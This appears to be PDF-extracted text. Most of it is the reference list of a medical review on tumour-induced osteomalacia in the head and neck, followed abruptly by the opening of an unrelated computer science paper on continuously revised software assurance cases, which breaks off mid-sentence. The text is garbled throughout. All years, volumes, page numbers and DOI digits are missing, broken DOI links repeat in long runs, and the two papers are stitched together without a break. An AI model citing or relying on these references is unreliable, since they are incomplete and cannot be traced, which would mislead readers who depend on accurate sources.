tumour of the ethmoid associated with oncogenic osteomalacia. journal of craniofacial surgery – . dupond jl, mahammedi h, magy n, blagosklonov o, meaux- ruault n & kantelip b. detection of a mesenchymal tumor responsible for hypophosphatemic osteomalacia using fdg-pet. european journal of internal medicine – . (https://doi. org/ . /j.ejim. . . ) kaylie dm, jackson cg & gardner ek. oncogenic osteomalacia caused by phosphaturic mesenchymal tumor of the temporal bone. otolaryngology–head and neck surgery – . (https://doi. org/ . /j.otohns. . . ) inokuchi g, tanimoto h, ishida h, sugimoto t, yamauchi m, miyauchi a & nibu k. a paranasal tumor associated with tumor- induced osteomalacia. laryngoscope – . (https:// doi.org/ . / .mlg. . . ) yoshioka k, nagata r, ueda m, yamaguchi t, konishi y, hosoi m, inoue t, yamanaka k, iwai y & sato t. phosphaturic mesenchymal tumor with symptoms related to osteomalacia that appeared one year after tumorectomy. internal medicine – . (https://doi.org/ . /internalmedicine. . ) koriyama n, nishimoto k, kodama t, nakazaki m, kurono y, yoshida h & tei c. oncogenic osteomalacia in a case with a maxillary sinus mesenchymal tumor. american journal of the medical sciences – . (https://doi.org/ . / - - ) elston ms, stewart ij, clifton-bligh r & conaglen jv. a case of oncogenic osteomalacia with preoperative secondary hyperparathyroidism: description of the biochemical response of fgf to octreotide therapy and surgery. bone – . (https://doi.org/ . /j.bone. . . ) beech tj, rokade a, gittoes n & johnson ap. a hemangiopericytoma of the ethmoid sinus causing oncogenic osteomalacia: a case report and review of the literature. international journal of oral and this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /internalmedicine . . https://doi.org/ . /internalmedicine . . https://doi.org/ . /lary. . . . https://doi.org/ . /lary. . . . https://doi.org/ . / - - https://doi.org/ . /j. - . .tb .x https://doi.org/ . /j. - . .tb .x https://doi.org/ . /s https://doi.org/ . / - ( ) : < ::aid-cncr > . .co; -s https://doi.org/ . / - ( ) : < ::aid-cncr > . .co; -s https://doi.org/ . /(sici) - ( / ) : < ::aid-hed > . .co; -z https://doi.org/ . /(sici) - ( / ) : < ::aid-hed > . .co; -z https://doi.org/ . /jcem. . . https://doi.org/ . /s - ( ) - https://doi.org/ . /ajr. . . https://doi.org/ . /ajr. . . https://doi.org/ . /kjim. . . . https://doi.org/ . /kjim. . . . https://doi.org/ . /s https://doi.org/ . /s https://doi.org/ . /s https://doi.org/ . /rheumatology/ . . https://doi.org/ . /rheumatology/ . . https://doi.org/ . /a: https://doi.org/ . /a: https://doi.org/ . /s https://doi.org/ . /s https://doi.org/ . /s https://doi.org/ . /s - ( ) - https://doi.org/ . /s - ( ) - https://doi.org/ . /j. - . .tb .x https://doi.org/ . /j. - . .tb .x https://doi.org/ . / .rhu. . .ed https://doi.org/ . /j.ejim. . . https://doi.org/ . /j.ejim. . . https://doi.org/ . /j.otohns. . . https://doi.org/ . /j.otohns. . . https://doi.org/ . / .mlg. . . https://doi.org/ . / .mlg. . . https://doi.org/ . /internalmedicine. . https://doi.org/ . / - - https://doi.org/ . / - - https://doi.org/ . /j.bone. . . https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com r shah et al. case series of head neck tio and review : maxillofacial surgery – . (https://doi.org/ . /j. ijom. . . ) ahn jm, kim hj, cha cm, kim j, yim sg & kim hj. oncogenic osteomalacia: induced by tumour, cured by surgery. oral surgery, oral medicine, oral pathology, oral radiology, and endodontics – . (https://doi.org/ . /j.tripleo. . . ) uramoto n, furukawa m & yoshizaki t. malignant phosphaturic mesenchymal tumor, mixed connective tissue variant of the tongue. auris, nasus, larynx – . (https://doi.org/ . /j. anl. . . ) lewiecki em, urig ej & williams rc. tumor-induced osteomalacia: lessons learned. arthritis and rheumatism – . (https:// doi.org/ . /art. ) kenealy h, holdaway i & grey a. occult nasal sinus tumours causing oncogenic osteomalacia. european journal of internal medicine – . (https://doi.org/ . /j.ejim. . . ) yun ki, kim dh & pyo sw. a phosphaturic mesenchymal tumor of the floor of the mouth with oncogenic osteomalacia: report of a case. journal of oral and maxillofacial surgery – . (https:// doi.org/ . /j.joms. . . ) woo vl, landesberg r, imel ea, singer sr, folpe al, econs mj, kim t, harik lr & jacobs tp. phosphaturic mesenchymal tumor, mixed connective tissue variant, of the mandible: report of a case and review of the literature. oral surgery, oral medicine, oral pathology, oral radiology, and endodontics – . (https:// doi.org/ . /j.tripleo. . . ) savage cr & zimmer la. oncogenic osteomalacia from pterygopalatine fossa mass. journal of laryngology and otology – . (https://doi.org/ . /s ) kurien r, manipadam mt & rupa v. oncogenic osteomalacia in a patient with an ethmoid sinus tumour. journal of laryngology and otology – . (https://doi.org/ . / s ) gupta r, sharma a, ksh a, khadgawat r & dinda ak. phosphaturic mesenchymal tumour of the sinonasal tract. acta endocrinologica (bucharest) – . (https://doi.org/ . /aeb. . ) gore mo, welch bj, geng w, kabbani w, maalouf nm, zerwekn je, moe ow & sakhaee k. renal phosphate wasting due to tumor- induced osteomalacia: a frequently delayed diagnosis. kidney international – . (https://doi.org/ . / ki. . ) kobayashi k, nakao k, kawai k, ito k, hukumoto s, asakage t, oota s & motoi r. tumor-induced osteomalacia originating from the temporal bone: a case report. head and neck – . (https://doi.org/ . /hed. ) shelekhova kv, kazakov dv & michal m. sinonasal phosphaturic mesenchymal tumor (mixed connective tissue variant): report of cases. american journal of surgical pathology – . (https://doi.org/ . /pas. b e d fa) pedrazzoli m, colletti g, ferrari m, rossetti g, moneghini l & autelitano l. mesenchymal phosphaturic neoplasm in the maxillary sinus: a case report. international journal of oral and maxillofacial surgery – . (https://doi.org/ . /j. ijom. . . ) mori y, ogasawara t, motoi t, shimizu y, chikazu d, tamura k, fukumoto s & takato t. tumor-induced osteomalacia associated with a maxillofacial tumor producing fibroblast growth factor : report of a case and review of the literature. oral surgery, oral medicine, oral pathology, oral radiology, and endodontics e –e . (https:// doi.org/ . /j.tripleo. . . ) parshwanath ha, kulkarni pr, rao r, joshi sk & patil p. phosphaturic mesenchymal tumor of ethmoid sinus. indian journal of pathology and microbiology – . (https://doi.org/ . / - . ) battoo aj, salih s, unnikrish ag, jojo a, bahadur s, iyer s & kuriakose ma. oncogenic osteomalacia from nasal cavity giant cell tumor. head and neck – . (https://doi. org/ . /hed. ) arnaoutakis d & naseri i. sinonasal phosphaturic mesenchymal tumor: a rare and misinterpreted entity. journal of neurological surgery reports e –e . (https://doi. org/ . /s- - ) peters kb, mclendon r, morse ma & vredenburgh jj. treatment of recurrent intracranial hemangiopericytoma with src-related tyrosine kinase targeted therapy: a case report. case reports in oncology – . (https://doi.org/ . / ) akhter m, sugrue pa, bains r & khavkin ya. oncogenic osteomalacia of the cervical spine: a rare case of curative resection and reconstruction. journal of neurosurgery. spine – . (https://doi.org/ . / . .spine ) xian-ling w, jian-ming b, wen-wen z, zhao-hui l, jing-tao d, ju-ming l & yi-ming m. osteomalacia caused by tumors in facies cranii mimicking rheumatoid arthritis. rheumatology international – . (https://doi.org/ . /s - - - ) guglielmi g, bisceglia m, scillitani a & folpe al. oncogenic osteomalacia due to phosphaturic mesenchymal tumor of the craniofacial sinuses. clinical cases in mineral and bone metabolism – . uno t, kawai k, kunii n, fukumoto s, shibahara j, motoi t & saito n. osteomalacia caused by skull base tumors: report of cases. neurosurgery e –e ; discussion e . (https://doi. org/ . /neu. b e f ) andreupoulou p, dumitrescu ce, kelly mh, brillante ba, peck cmc, wodajo fm, chang r & collins mt. selective venous catheterization for the localization of phosphaturic mesenchymal tumors. journal of bone and mineral research – . bergwitz c, collins mt, kamath rs & rosenberg ae. case – : a -year-old man with hypophosphatemia. new england journal of medicine – . (https://doi.org/ . / nejmcpc ) monappa v, naik am, mathew m, rao l, rao sk, ramachandra l & padmapriya j. phosphaturic mesenchymal tumour of the mandible – the useful criteria for a diagnosis on fine needle aspiration cytology. cytopathology – . (https://doi.org/ . / cyt. ) chokyu i, ishibashi k, goto t & ohata k. oncogenic osteomalacia associated with mesenchymal tumor in the middle cranial fossa: a case report. journal of medical case reports . (https://doi. org/ . / - - - ) chiam p, tan hc, bee ym & chandran m. oncogenic osteomalacia – hypophosphatemic spectrum from benignancy to malignancy. bone – . (https://doi.org/ . /j.bone. . . ) cho s, do ny, yu sw & choi jy. nasal hemangiopericytoma causing oncogenic osteomalacia. clinical and experimental otolaryngology – . burnand h, samuels a, hagan i, sawant n & mutimer j. bilateral subtrochanteric fractures in tumor-induced osteomalacia caused by a nasal hemangiopericytoma. hip international – . (https://doi.org/ . /hip. . ) brandwein-gensler m & siegal gp. striking pathology gold: a singular experience with daily reverberations: sinonasal hemangiopericytoma (glomangiopericytoma) and oncogenic osteomalacia. head and neck pathology – . (https://doi.org/ . /s - - - ) munoz j, ortega rm, celzo f & donthireddy v. tumour-induced osteomalacia. bmj case reports bcr . (https:// doi.org/ . /bcr. . . ) chang cv, conde sj, luvizotto ram, nunes vs, bonates mc, felicio ac, lindsey sc, moraes fh, tagliarini jv, mazeto gmfs, et al. oncogenic osteomalacia: loss of hypophosphatemia might be the key to avoid misdiagnosis. arquivos brasileiros de endocrinologia e metabologia – . (https://doi.org/ . /s - ) this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /j.ijom. . . https://doi.org/ . /j.ijom. . . https://doi.org/ . /j.tripleo. . . https://doi.org/ . /j.anl. . . https://doi.org/ . /j.anl. . . https://doi.org/ . /art. https://doi.org/ . /art. https://doi.org/ . /j.ejim. . . https://doi.org/ . /j.joms. . . https://doi.org/ . /j.joms. . . https://doi.org/ . /j.tripleo. . . https://doi.org/ . /j.tripleo. . . https://doi.org/ . /s https://doi.org/ . /s https://doi.org/ . /s https://doi.org/ . /aeb. . https://doi.org/ . /ki. . https://doi.org/ . /ki. . https://doi.org/ . /hed. https://doi.org/ . /pas. b e d fa https://doi.org/ . /j.ijom. . . https://doi.org/ . /j.ijom. . . https://doi.org/ . /j.tripleo. . . https://doi.org/ . /j.tripleo. . . https://doi.org/ . / - . https://doi.org/ . / - . https://doi.org/ . /hed. https://doi.org/ . /hed. https://doi.org/ . /s- - https://doi.org/ . /s- - https://doi.org/ . / https://doi.org/ . / . .spine https://doi.org/ . /s - - - https://doi.org/ . /neu. b e f https://doi.org/ . /neu. b e f https://doi.org/ . /nejmcpc https://doi.org/ . /nejmcpc https://doi.org/ . /cyt. https://doi.org/ . /cyt. https://doi.org/ . / - - - https://doi.org/ . / - - - https://doi.org/ . /j.bone. . . https://doi.org/ . /hip. . https://doi.org/ . /s - - - https://doi.org/ . /bcr. . . https://doi.org/ . /bcr. . . https://doi.org/ . /s - https://doi.org/ . /s - https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com r shah et al. case series of head neck tio and review pb– : jiang y, xia wb, xing xp, silva bc, li m, wang o, zhang hb, li f, jing hl, zhong dr, et al. tumor-induced osteomalacia: an important cause of adult-onset hypophosphatemic osteomalacia in china: report of cases and review of the literature. journal of bone and mineral research – . (https://doi.org/ . / jbmr. ) fatani ha, sunbuli m, lai sy & bell d. phosphaturic mesenchymal tumor: a report of patients treated at a single institution and comparison with reported series. annals of diagnostic pathology – . (https://doi.org/ . /j.anndiagpath. . . ) mathis da, stehel ej, beshay je, mickey be, folpe al & raisanen j. intracranial phosphaturic mesenchymal tumors: report of cases. journal of neurosurgery – . (https://doi. org/ . / . .jns ) tarasova vd, trepp-carrasco ag, thompson r, recker rr, chong wh, collins mt & armas la. successful treatment of tumor-induced osteomalacia due to an intracranial tumor by fractionated stereotactic radiotherapy. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jc. - ) papierska l, Ćwikła jb, misiorowski w, rabijewski m, sikora k & wanyura h. unusual case of phosphaturic mesenchymal tumor. polskie archiwum medycyny wewnetrznej – . (https:// doi.org/ . /pamw. ) lee gg, dhong hj, park ys & ko yh. sinonasal glomangiopericytoma causing oncogenic osteomalacia. clinical and experimental otorhinolaryngology – . (https://doi. org/ . /ceo. . . . ) allevi f, rabbiosi d, mandala m & colletti g. mesenchymal phosphaturic tumour: early detection of recurrence. bmj case reports bcr . (https://doi.org/ . /bcr- - ) annamalai ak, sampathkumar k, kane s, shetty ns, kulkarni s, rangarajan v, purandare n, pai ps, mahuvakar ad, shanthi r, et al. needles in the haystack – synchronous multifocal tumor-induced osteomalacia. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jc. - ) okamiya t, takahashi k, kamada h, hirato j, motoi t, fukumoto s & chikamatsu k. oncogenic osteomalacia caused by an occult paranasal sinus tumor. auris, nasus, larynx – . (https://doi.org/ . /j.anl. . . ) mok y, lee jc, lum jhy & petersson f. from epistaxis to bone pain – report of two cases illustrating the clinicopathological spectrum of phosphaturic mesenchymal tumor with fibroblast growth factor receptor immunohistochemical and cytogenetic analyses. histopathology – . (https://doi.org/ . / his. ) fernandez-cooke e, cruz-rojo j, gallego c, romance ai, mosqueda- pena r, almaden y & del pozo js. tumor-induced rickets in a child with a central giant cell granuloma: a case report. pediatrics e –e . (https://doi.org/ . /peds. - ) fathalla h, cusimano m, di leva a, karamchandani j, fung r & kovacs k. osteomalacia-inducing tumors of the brain: a case report, review and a hypothesis. world neurosurgery .e – .e . (https://doi.org/ . /j.wneu. . . ) ray s, chakraborty pp, biswas k, ghosh s, mukhopadhyay s & chowdhury s. a case of oncogenic osteomalacia due to occult nasal sinus tumor. clinical cases in mineral and bone metabolism – . (https://doi.org/ . /ccmbm/ . . . ) qari h, hamao-sakamoto a, fuselier c, cheng ysl, kessler h & wright j. phosphaturic mesenchymal tumor: new oral cases and review of cases in the head and neck. head and neck pathology – . (https://doi.org/ . /s - - - ) wasserman jk, purgina b, lai ck, gravel d, mahaffey a, bell d & chiosea si. phosphaturic mesenchymal tumor involving the head and neck: a report of five cases with fgfr fluorescence in situ hybridization analysis. head and neck pathology – . (https://doi.org/ . /s - - - ) mani mk & panigrahi mk. unusual calvarial tumour-oncogenic osteomalacia. british journal of neurosurgery – . (https://doi.org/ . / . . ) yu wj, he jw, fu wz, wang c & zhang zl. reports of chinese patients with tumor-induced osteomalacia. journal of bone and mineral metabolism – . (https://doi.org/ . / s - - - ) takashi y, kinoshita y, ito n, taguchi m, takahashi m, egami n, tajima s, nangaku m & fukumoto s. tumor-induced osteomalacia caused by a parotid tumor. internal medicine – . (https://doi.org/ . /internalmedicine. . ) gresham ms, shen s, zhang yj & gallagher k. anterior skull base glomangioma-induced osteomalacia. journal of neurological surgery reports e –e . (https://doi. org/ . /s- - ) agaimy a, michal m, chiosea s, petersson f, hadravsky l, kristiansen g, horch re, schmolders j, hartmann a, haller f, et al. phosphaturic mesenchymal tumors: clinicopathologic, immunohistochemical and molecular analysis of cases expanding their morphologic and immunophenotypic spectrum. american journal of surgical pathology – . (https://doi. org/ . /pas. ) lee jy, park hs, han s, lim jk, hong n, park si & rhee y. localization of oncogenic osteomalacia by systemic venous sampling of fibroblast growth factor . yonsei medical journal – . (https://doi.org/ . /ymj. . . . ) schober hc, kneitz c, fieber f, hesse k & schroeder h. selective blood sampling for fgf- in tumor-induced osteomalacia. endocrinology, diabetes and metabolism case reports . (https://doi.org/ . /edm- - ) zuo qy, wang h, li w, niu xh, huang yh, chen j, you yh, liu by, cui am & deng w. treatment and outcomes of tumor- induced osteomalacia associated with phosphaturic mesenchymal tumors: retrospective review of patients. bmc musculoskeletal disorders . (https://doi.org/ . /s - - - ) hana t, tanaka s, nakatomi h, shojima m, fukumoto s, ikemura m & saito n. definitive surgical treatment of osteomalacia induced by skull base tumor and determination of the half-life of serum fibroblast growth factor . endocrine journal – . (https://doi.org/ . /endocrj.ej - ) chanukya gv, mengade m, goud j, rao is & jain a. tumor- induced osteomalacia: a sherlock holmes approach to diagnosis and management. annals of maxillofacial surgery – . (https://doi.org/ . /ams.ams_ _ ) gonzalez g, baudrand r, sepulveda mf, vucetich n, guarda fj, villanueva p, contreras o, villa a, salech f, toro l, et al. tumor- induced osteomalacia: experience from a south american academic centre. osteoporosis international – . (https://doi. org/ . /s - - - ) singh d, chopra a, ravina m, kongara s, bhatia e, kumar n, gupta s, yadav s, dabadghao p, yadav r, et al. oncogenic osteomalacia: role of ga- dotanoc pet/ct scan in identifying the culprit lesion and its management. british journal of radiology . (https://doi.org/ . /bjr. ) pelletier k, troyanov s, guite jf, sainte-marie lg, roberge d & lessard m. localization of ectopic fibroblast growth factor production in tumor-induced osteomalacia using selective venous samplings. clinical nephrology – . (https://doi. org/ . /cn ) mumford e, marks j, wagner t, gallimore a, gane s & walsh sb. oncogenic osteomalacia: diagnosis, localisation, and cure. lancet oncology e . (https://doi.org/ . /s - ( ) - ) this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /jbmr. https://doi.org/ . /jbmr. https://doi.org/ . /j.anndiagpath. . . https://doi.org/ . / . .jns https://doi.org/ . / . .jns https://doi.org/ . /jc. - https://doi.org/ . /pamw. https://doi.org/ . /pamw. https://doi.org/ . /ceo. . . . https://doi.org/ . /ceo. . . . https://doi.org/ . /bcr- - https://doi.org/ . /bcr- - https://doi.org/ . /jc. - https://doi.org/ . /j.anl. . . https://doi.org/ . /his. https://doi.org/ . /his. https://doi.org/ . /peds. - https://doi.org/ . /j.wneu. . . https://doi.org/ . /ccmbm/ . . . https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . / . . https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /internalmedicine. . https://doi.org/ . /s- - https://doi.org/ . /s- - https://doi.org/ . /pas. https://doi.org/ . /pas. https://doi.org/ . /ymj. . . . https://doi.org/ . /edm- - https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /endocrj.ej - https://doi.org/ . /ams.ams_ _ https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /bjr. https://doi.org/ . /cn https://doi.org/ . /cn https://doi.org/ . /s - ( ) - https://doi.org/ . /s - ( ) - https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com r shah et al. case series of head neck tio and review : villepelet a, casiraghi o, temam s & moya-plana a. ethmoid tumor and oncogenic osteomalacia: case report and review of the literature. european annals of otorhinolaryngology, head and neck diseases – . (https://doi.org/ . /j. anorl. . . ) pelo s, gasparini g, garagiola u, d’amato g, saponaro g, doneddu p, todaro m & moro a. phosphaturic mesenchymal tumor, an unusual localization in head and neck. journal of surgical case reports rjy . (https://doi.org/ . /jscr/rjy ) he q, xu z, zhang b, hu w & zhang x. tumor-induced osteomalacia caused by a parotid basal cell adenoma detected by ga-dotanoc pet/ct. clinical nuclear medicine e –e . (https://doi.org/ . /rlu. ) wu h, bui mm, zhou l, li d, zhang h & zhong d. phosphaturic mesenchymal tumor with an admixture of epithelial and mesenchymal elements in the jaws: clinicopathological and immunohistochemical analysis of cases with literature review. modern pathology – . (https://doi.org/ . /s - - - ) ding j, hu g, wang l, li f & huo l. increased activity due to fractures does not significantly affect the accuracy of ga-dotatate pet/ct in the detection of culprit tumor in the evaluation of tumor-induced osteomalacia. clinical nuclear medicine – . (https://doi.org/ . / rlu. ) mishra t, desouza ma, patel k & mazumdar ga. phosphaturic mesenchymal tumors involving skull bones: report of two rare cases. asian journal of neurosurgery – . (https://doi. org/ . /ajns.ajns_ _ ) li j, huang y, yang f, zhang q, chen d & wang q. sinonasal hemangiopericytoma caused hypophosphatemic osteomalacia: a case report. medicine e . (https://doi.org/ . / md. ) acharya rp, won am, moon bs, flint jh, roubaud ms, williams md, hessel ac, murphy jr wa, chambers ms & gagel rf. tumor‐induced hypophosphatemic osteomalacia caused by a mesenchymal tumor of the mandible managed by a segmental mandibulectomy and microvascular reconstruction with a free fibula flap. head and neck e –e . (https://doi.org/ . /hed. ) kurien r, rupa v & thomas m. varied presentation of sinonasal phosphaturic mesenchymal tumour: report of a case series with follow-up. european archives of oto-rhino-laryngology – . (https://doi.org/ . /s - - - ) paul j, cherian ke, kapoor n & paul tv. treating osteoporosis: a near miss in an unusual case of fgf- mediated bone loss. bmj case reports e . (https://doi.org/ . /bcr- - ) pal r, bhadada sk, singhare a, bhansali a, kamalanathan s, chadha m, chauhan p, sood a, dhiman v, sharma dc, et al. tumor-induced osteomalacia: experience from three tertiary care centers in india. endocrine connections – . (https://doi. org/ . /ec- - ) jadhav s, kasaliwal r, lele v, rangarajan v, chandra p, shah h, malhotra g, jagtap vs, budyal s, lila ar, et al. functional imaging in primary tumour-induced osteomalacia: relative performance of fdg pet/ct vs somatostatin receptor-based functional scans: a series of nine patients. clinical endocrinology – . (https://doi. org/ . /cen. ) agrawal k, bhadada s, mittal br, shukla j, sood a, bhattacharya a & bhansali a. comparison of f-fdg and ga dotatate pet/ ct in localization of tumor causing oncogenic osteomalacia. clinical nuclear medicine e –e . (https://doi.org/ . / rlu. ) el-maouche d, sadowski sm, papadakis gz, guthrie l, cottle- delisle c, merkel r, millo c, chen cc, kebebew e & collins mt. ga-dotatate for tumor localization in tumor-induced osteomalacia. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jc. - ) basu s & fargose p. lu-dotatate prrt in recurrent skull- base phosphaturic mesenchymal tumor causing osteomalacia: a potential application of prrt beyond neuroendocrine tumors. journal of nuclear medicine technology – . (https://doi. org/ . /jnmt. . ) kane sv, kakkar a, oza n, sridhar e & pai ps. phosphaturic mesenchymal tumor of the nasal cavity and paranasal sinuses: a clinical curiosity presenting a diagnostic challenge. auris, nasus, larynx – . (https://doi.org/ . /j. anl. . . ) feng j, jiang y, wang o, li m, xing x, huo l, li f, yu w, zhong dr, jin j, et al. the diagnostic dilemma of tumor induced osteomalacia: a retrospective analysis of cases. endocrine journal – . (https://doi.org/ . /endocrj.ej - ) khosravi a, cutler cm, kelly mh, chang r, royal re, sherry rm, wodajo fm, fedarko ns & collins mt. determination of the elimination half-life of fibroblast growth factor- . journal of clinical endocrinology and metabolism – . (https://doi. org/ . /jc. - ) takeuchi y, suzuki h, ogura s, imai r, yamazaki y, yamashita t, miyamoto y, okazaki h, nakamura k, nakahara k, et al. venous sampling for fibroblast growth factor- confirms preoperative diagnosis of tumor-induced osteomalacia. journal of clinical endocrinology and metabolism – . (https://doi. org/ . /jc. - ) minisola s, peacock m, fukumoto s, cipriani c, pepe j, tella sh & collins mt. tumour-induced osteomalacia. nature reviews disease primers . (https://doi.org/ . /nrdp. . ) reubi jc, waser b, schaer jc & laissue ja. somatostatin receptor sst –sst expression in normal and neoplastic human tissues using receptor autoradiography with subtype-selective ligands. european journal of nuclear medicine – . (https://doi. org/ . /s ) de beur smj, streeten ea, civelek ac, mccarthy ef, uribe l, marx sj, onobrakpeya o, raisz lg, watts nb, sharon m, et al. localisation of mesenchymal tumours by somatostatin receptor imaging. lancet – . (https://doi.org/ . /s - ( ) - ) kimizuka t, ozaki y & sumi y. usefulness of tl and m tc mibi scintigraphy in a case of oncogenic osteomalacia. annals of nuclear medicine – . (https://doi.org/ . /bf ) dupond jl, mahammedi h, prie d, collin f, gil h, blagosklonov o, ricbourg b, meaux-ruault n & kantelip b. oncogenic osteomalacia: diagnostic importance of fibroblast growth factor and f- fluorodeoxyglucose pet/ct scan for the diagnosis and follow-up in one case. bone – . (https://doi.org/ . /j. bone. . . ) breer s, brunkhorst t, beil ft, peldschus k, heiland m, klutmann s, barvencik f, zustin j, gratz kf & amling m. ga dotatate pet/ ct allows tumor localization in patients with tumor-induced osteomalacia but negative in-octreotide spect/ct. bone – . (https://doi.org/ . /j.bone. . . ) zhang j, zhu z, zhong d, dang y, xing h, du y, jing h, qiao z, xing x, zhuang h, et al. ga dotatate pet/ct is an accurate imaging modality in the detection of culprit tumors causing osteomalacia. clinical nuclear medicine – . (https:// doi.org/ . /rlu. ) seufert j, ebert k, müller j, eulert j, hendrich c, werner e, schütze n, schulz g, kenn w, richtmann h, et al. octreotide therapy for tumor- induced osteomalacia. new england journal of medicine – . (https://doi.org/ . /nejmoa ) ovejero d, el‐maouche d, brillante ba, khosravi a, gafni ri & collins mt. octreotide is ineffective in treating tumor‐induced osteomalacia: results of a short‐term therapy. journal of bone and this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /j.anorl. . . https://doi.org/ . /j.anorl. . . https://doi.org/ . /jscr/rjy https://doi.org/ . /rlu. https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /rlu. https://doi.org/ . /rlu. https://doi.org/ . /ajns.ajns_ _ https://doi.org/ . /ajns.ajns_ _ https://doi.org/ . /md. https://doi.org/ . /md. https://doi.org/ . /hed. https://doi.org/ . /s - - - https://doi.org/ . /bcr- - https://doi.org/ . /bcr- - https://doi.org/ . /ec- - https://doi.org/ . /ec- - https://doi.org/ . /cen. https://doi.org/ . /cen. https://doi.org/ . /rlu. https://doi.org/ . /rlu. https://doi.org/ . /jc. - https://doi.org/ . /jnmt. . https://doi.org/ . /jnmt. . https://doi.org/ . /j.anl. . . https://doi.org/ . /j.anl. . . https://doi.org/ . /endocrj.ej - https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /nrdp. . https://doi.org/ . /s https://doi.org/ . /s https://doi.org/ . /s - ( ) - https://doi.org/ . /s - ( ) - https://doi.org/ . /bf https://doi.org/ . /j.bone. . . https://doi.org/ . /j.bone. . . https://doi.org/ . /j.bone. . . https://doi.org/ . /rlu. https://doi.org/ . /rlu. https://doi.org/ . /nejmoa https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com r shah et al. case series of head neck tio and review pb– : mineral research – . (https://doi.org/ . / jbmr. ) geller jl, khosravi a, kelly mh, riminucci m, adams js & collins mt. cinacalcet in the management of tumor‐induced osteomalacia. journal of bone and mineral research – . (https://doi.org/ . /jbmr. ) cives m & strosberg j. radionuclide therapy for neuroendocrine tumors. current oncology reports . (https://doi.org/ . / s - - - ) weidner n. review and update: oncogenic osteomalacia- rickets. ultrastructural pathology – . (https://doi. org/ . / ) received in final form august accepted september accepted preprint published online september this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /jbmr. https://doi.org/ . /jbmr. https://doi.org/ . /jbmr. https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . / https://doi.org/ . / https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com abstract introduction materials and methods cohort cohort cohort cohort cohort cohort statistical analysis results cohort cohort cohort cohort cohort cohort discussion cohort cohort cohort cohort cohort cohort epidemiology biochemical profile location of tumor localization imaging treatment primary modality persistent/recurrent disease metastases histopathology study limitations summary declaration of interest funding references submitted january accepted november published december corresponding author kimio kuramitsu, kimio@ynu.ac.jp academic editor mariagrazia fugini additional information and declarations can be found on page doi . /peerj-cs. copyright kuramitsu distributed under creative commons cc-by . open access continuously revised assurance cases with stakeholders’ cross-validation: a deos experience kimio kuramitsu graduate school of electronic and computer engineering, yokohama national university, japan abstract recently, assurance cases have received much attention in the field of software-based computer systems and it services. however, software changes very often, and there are no strong regulations for software. these facts are two main challenges to be addressed in the development of software assurance cases. we propose a method of developing assurance cases by means of continuous revision at every stage of the system life cycle, including in operation and service recovery in failure cases. instead of a regulator, dependability arguments are validated by multiple stakeholders competing with each other. this paper reported our experience with the proposed method in the case of aspen education service. the case study demonstrates that continuous revisions enable stakeholders to share dependability problems across software life cycle stages, which will lead to the long-term improvement of service dependability. subjects security and privacy, software engineering keywords assurance cases, gsn, deos process, experience report, service dependability introduction assurance cases are documentation-based engineering with structured arguments on safety and dependability. originally, assurance cases were developed in the field of safety engineering for public transportation and industrial plants, and they have been adopted broadly as a documentation standard (bloomfield & bishop, ). many regulators, especially in eu countries, are likely to validate assurance cases before the developed systems are deployed. recently, due to increased attention to safety and dependability in software, many developers have become interested in the application of assurance cases for software. however, software often changes over time and even needs to change after deployment. the emerging style of devops development suggests that it would be difficult to separate developments from service operations. this also makes it difficult for a regulator to assess assurance cases, thereby resulting in the absence of strong regulators for software in general. to overcome these difficulties, the deos process (tokoro, ) was developed with the life cycle maintenance of assurance cases. the idea is straightforward: assurance cases are revised in a synchronized way as software updates. an arising question is as follows: who validates such revised assurance cases, even in the post-development phase? the answer is still unclear in the deos process. in this paper, we assume that stakeholders how to cite this article kuramitsu ( ), continuously revised assurance cases with stakeholders’ cross-validation: a deos experience. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:kimio@ynu.ac.jp https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. who are competing with each other are motivated to validate cases because they will suffer directly from others’ faulty claims in assurance cases. however, many questions remain. can non-expert stakeholders learn about assurance cases and then join dependability arguments? is the validation strong enough? to confirm these questions, we organized a case study experiment, the aspen project, in which multiple stakeholders (e.g., developers, operators, and users) are involved in the software life 